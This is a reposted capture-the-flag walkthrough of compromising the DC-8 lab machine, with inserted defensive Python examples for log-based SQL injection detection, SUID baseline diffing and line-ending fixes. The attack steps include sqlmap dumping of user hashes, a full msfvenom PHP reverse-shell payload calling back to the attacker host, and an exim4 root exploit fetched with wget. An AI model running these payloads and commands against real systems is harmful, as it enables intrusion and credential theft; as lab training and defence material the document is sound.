Compromising the DC-8 target machine

DC-8

1. Host discovery

Run an Nmap ping scan (-sP) of the subnet and pick out the target's IP address by its known MAC address.

Nmap -sP 192.168.43.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 中国标准时间
Nmap scan report for 192.168.43.1
Host is up (0.0049s latency).
MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communications)
Nmap scan report for dc-8 (192.168.43.18)
Host is up (0.0010s latency).
MAC Address: 00:0C:29:7F:AC:13 (VMware)
Nmap scan report for ToolsScannerKali20201 (192.168.43.193)
Host is up (0.0050s latency).
MAC Address: 00:0C:29:D4:89:D8 (VMware)
Nmap scan report for LAPTOP-Q7VIH3TM (192.168.43.2)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.89 seconds

2. Information gathering

Port scan

Full TCP port scan with Nmap, with service and OS detection, output saved to a file:

C:\Users\ASUS>Nmap 192.168.43.18 -A -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:36 中国标准时间
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.13% done; ETC: 16:37 (0:00:01 remaining)
Nmap scan report for dc-8 (192.168.43.18)
Host is up (0.000094s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:7F:AC:13 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms dc-8 (192.168.43.18)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.28 seconds

Visit the web page

Fingerprinting

whatweb http://192.168.43.18

Directory scan

dirb http://192.168.43.18

Check the robots.txt file

http://192.168.43.18/robots.txt

An admin login page is found.

An error-based SQL injection point is found (the nid parameter used by sqlmap below).

3. Exploitation

sqlmap injection

List the databases

sqlmap -u http://192.168.43.18/?nid=0%27 --dbs

List the tables

sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db --tables

List the columns

sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db -T users --columns

Dump the column contents

sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db -T users -C "uid,name,pass" --dump 
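Seen from the web server's side, the sqlmap run above leaves a very recognisable trail: a quote injected into the nid parameter, followed by a burst of requests carrying sqlmap's default User-Agent. The detector below is an added example, not part of the original write-up or of any DC-8 material; it parses Apache "combined" access log lines and flags both indicators per client IP. All log lines are constructed samples (the sqlmap User-Agent string and timestamps are made up), not captured from DC-8.

```python
"""Flag SQL-injection probing in Apache combined-format access logs.

Added example (not from the original DC-8 write-up). Detects:
  * a quote / comment / boolean probe inside any query-string parameter
  * sqlmap's default User-Agent
and aggregates the hits per client IP so a burst from one host stands out.
"""
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Apache combined log: ip ident user [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Deliberately simple indicators: quote characters, SQL comment openers,
# UNION/SELECT, "or 1=1"-style tautologies and time-based probe functions.
SQLI_VALUE_RE = re.compile(
    r"'|\"|--|#|/\*|\bunion\b.*\bselect\b|\b(?:or|and)\b\s+\d+\s*=\s*\d+|\bsleep\s*\(|\bbenchmark\s*\(",
    re.IGNORECASE,
)
SCANNER_UA_RE = re.compile(r"sqlmap", re.IGNORECASE)


def analyze_line(line):
    """Return the list of indicator names found in one log line ([] when clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    indicators = []
    if SCANNER_UA_RE.search(m.group("ua")):
        indicators.append("scanner-ua")
    query = urlsplit(m.group("path")).query
    # keep_blank_values so a bare "?nid=" is still inspected; parse_qsl already
    # percent-decodes once, the extra unquote catches double-encoded payloads.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SQLI_VALUE_RE.search(unquote(value)):
            indicators.append(f"sqli-param:{name}")
    return indicators


def scan_log(lines):
    """Aggregate indicators per client IP: {ip: sorted list of indicator names}."""
    report = {}
    for line in lines:
        hits = analyze_line(line)
        if not hits or hits == ["unparsed"]:
            continue
        ip = LOG_RE.match(line).group("ip")
        report.setdefault(ip, set()).update(hits)
    return {ip: sorted(hits) for ip, hits in report.items()}


# Constructed sample log: one normal visitor (.2) and one scanning host (.193).
SAMPLE_LOG = [
    '192.168.43.2 - - [15/Oct/2020:16:40:01 +0800] "GET /?nid=1 HTTP/1.1" 200 5321 "-" "Mozilla/5.0"',
    '192.168.43.193 - - [15/Oct/2020:16:41:12 +0800] "GET /?nid=0%27 HTTP/1.1" 200 4021 "-" "sqlmap/1.4 (http://sqlmap.org)"',
    '192.168.43.193 - - [15/Oct/2020:16:41:13 +0800] "GET /?nid=0%27%20AND%201%3D1 HTTP/1.1" 200 4021 "-" "sqlmap/1.4 (http://sqlmap.org)"',
    '192.168.43.2 - - [15/Oct/2020:16:42:00 +0800] "GET /robots.txt HTTP/1.1" 200 1561 "-" "Mozilla/5.0"',
    '192.168.43.2 - - [15/Oct/2020:16:42:30 +0800] "GET /?nid=2&q=search HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        print(ip, hits)
```

The regex list is intentionally short; in production you would feed the same parsed parameters to a WAF ruleset or a SIEM, but even this much is enough to alert on the first probe, long before a --dump completes. The fix on the application side is parameterised queries in the vulnerable module, which removes the injection point rather than just detecting it.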

Crack the dumped password hashes with john

Recovered credentials: john:turtle

Log in to the web backend

Find an exploitation point

Content >> Contact Us; WEBFORM >> Form components; WEBFORM >> Form settings

Generate a PHP shell with MSF

kali@ToolsScannerKali20201:~$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 R > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1115 bytes

kali@ToolsScannerKali20201:~$ cat shell.php 
/*<?php /**/ error_reporting(0); $ip = '192.168.43.193'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
kali@ToolsScannerKali20201:~$ 

Paste the PHP shell and execute it

Start a listener in MSF

kali@ToolsScannerKali20201:~$ msfconsole 
[!] The following modules could not be loaded!..-
[!]     /usr/share/metasploit-framework/modules/exploits/windows/iis/cve-2017-7269.rb
[!] Please see /home/kali/.msf4/logs/framework.log for details.

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to check out the result of hosts and services

msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.43.193
LHOST => 192.168.43.193
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.43.193:4444 
[*] Sending stage (38288 bytes) to 192.168.43.18
[*] Meterpreter session 1 opened (192.168.43.193:4444 -> 192.168.43.18:44810) at 2020-10-15 07:36:25 -0400

meterpreter > getuid
Server username: www-data (33)
meterpreter > 

Return to the Contact Us page and submit arbitrary content.

4. Privilege escalation

Interactive shell

shell
python -c "import pty;pty.spawn('/bin/bash')"

Use find to list binaries with the SUID bit set. (The session below writes 2>dev/null, which only resolves to /dev/null because the working directory is /; the portable form is 2>/dev/null.)

www-data@dc-8:/$ find / -perm /4000 2>dev/null
find / -perm /4000 2>dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
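The same SUID listing the attacker reads for escalation candidates is a cheap integrity signal for the host owner: on a built-from-package Debian system the set of setuid binaries barely changes, so any addition deserves a look. The script below is an added example, not from the original write-up or from DC-8 itself. It parses raw find output (prompt lines and all), compares it with a baseline snapshot, and can also collect a live listing. The "current" listing is the one shown above; the baseline is constructed to lack /usr/sbin/exim4, as if the mail package had been installed after the baseline was taken.

```python
"""Compare the SUID binaries on a host against a known baseline.

Added example, not part of the original DC-8 write-up. The listings below are
constructed: CURRENT_LISTING mirrors the find output from the write-up,
BASELINE_LISTING is the same list without exim4 to show a reported addition.
"""
import os
import stat

CURRENT_LISTING = """\
www-data@dc-8:/$ find / -perm /4000 2>dev/null
find / -perm /4000 2>dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
"""

# Constructed baseline: identical to the current list except exim4 is absent.
BASELINE_LISTING = "\n".join(
    line for line in CURRENT_LISTING.splitlines() if line != "/usr/sbin/exim4"
)

# Pseudo-filesystems that a live walk should never descend into.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def parse_listing(text):
    """Turn raw find output into a set of absolute paths, dropping prompt/echo noise."""
    return {line.strip() for line in text.splitlines() if line.strip().startswith("/")}


def diff_suid(baseline, current):
    """Report which SUID binaries appeared or disappeared relative to the baseline."""
    return {
        "added": sorted(current - baseline),
        "removed": sorted(baseline - current),
    }


def collect_suid(root="/"):
    """Live equivalent of `find / -perm /4000`, implemented with os.walk + lstat."""
    found = set()
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


if __name__ == "__main__":
    result = diff_suid(parse_listing(BASELINE_LISTING), parse_listing(CURRENT_LISTING))
    print("added:", result["added"])
    print("removed:", result["removed"])
```

A newly appeared setuid network daemon is exactly the kind of entry to check against the installed package version and its advisories; running collect_suid() from a cron job and diffing against a signed baseline is enough to catch both package drift and a planted setuid shell.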

Check the exim4 version

Escalating through exim4 needs a writable location; the files are written under /tmp.

Search for known exim4 vulnerabilities with searchsploit

searchsploit exim

Choose the local privilege escalation exploit and serve it from the attacking machine

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp
python -m SimpleHTTPServer

On the target, download the exploit with wget

cd /tmp
wget http://192.168.43.193:8000/46996.sh
ls -l
chmod +x 46996.sh

An error occurs.

The same error appeared in DC-5.

In vim, set ff=unix converts the file to Unix line endings so that a script saved on Windows can run on Unix.

After the change, download it again.
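The set ff=unix step exists because a script that passed through Windows carries \r\n line endings; the kernel then looks for an interpreter literally named "/bin/bash\r", which does not exist, so the script fails before its first line runs. The helper below is an added example, not from the original write-up: it reports how many CRLF lines a script has and whether its shebang is affected, and normalizes the file the same way vim's set ff=unix does (CRLF to LF, UTF-8 BOM removed). The sample script is constructed.

```python
"""Detect and normalize Windows line endings in a shell script.

Added example (not from the original DC-8 write-up). inspect_script() explains
why a CRLF script fails (the shebang path gains a trailing '\r');
normalize() performs the equivalent of vim's `set ff=unix`.
"""
import os

UTF8_BOM = b"\xef\xbb\xbf"


def shebang_of(data: bytes) -> str:
    """Interpreter path exactly as the kernel would read it, including any stray '\r'."""
    first_line = data.split(b"\n", 1)[0]
    if not first_line.startswith(b"#!"):
        return ""
    return first_line[2:].strip(b" \t").split(b" ", 1)[0].decode("utf-8", "replace")


def inspect_script(data: bytes) -> dict:
    """Summarize line-ending problems in a script."""
    shebang = shebang_of(data)
    return {
        "crlf_lines": data.count(b"\r\n"),
        "shebang_broken": shebang.endswith("\r"),
        "bom": data.startswith(UTF8_BOM),
    }


def normalize(data: bytes) -> bytes:
    """CRLF -> LF and strip a UTF-8 BOM; leaves lone '\r' bytes alone, like vim's ff=unix."""
    if data.startswith(UTF8_BOM):
        data = data[len(UTF8_BOM):]
    return data.replace(b"\r\n", b"\n")


def fix_file(path: str) -> dict:
    """Normalize a script in place; returns the inspection result from before the fix."""
    with open(path, "rb") as fh:
        data = fh.read()
    before = inspect_script(data)
    fixed = normalize(data)
    if fixed != data:
        with open(path, "wb") as fh:
            fh.write(fixed)
    return before


# Constructed sample: a three-line script as it would look after a Windows editor.
SAMPLE_SCRIPT = b"#!/bin/bash\r\n# constructed sample, mimics a script saved on Windows\r\necho hello\r\n"

if __name__ == "__main__":
    print("before:", inspect_script(SAMPLE_SCRIPT), repr(shebang_of(SAMPLE_SCRIPT)))
    print("after: ", inspect_script(normalize(SAMPLE_SCRIPT)), repr(shebang_of(normalize(SAMPLE_SCRIPT))))
    if os.path.exists("46996.sh"):
        print("fixed 46996.sh:", fix_file("46996.sh"))
```

Running inspect_script() on a freshly downloaded script before chmod +x saves the round trip of "error, edit in vim, download again" described above; the same check belongs in any pipeline that moves shell scripts between Windows and Linux hosts.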

Privilege escalation does not succeed.

Look at the script

The script offers two execution methods; try the second one.

./46996.sh -m netcat

5. Privilege escalation succeeds; read the flag


Reposted from blog.csdn.net/qq_42094992/article/details/109100082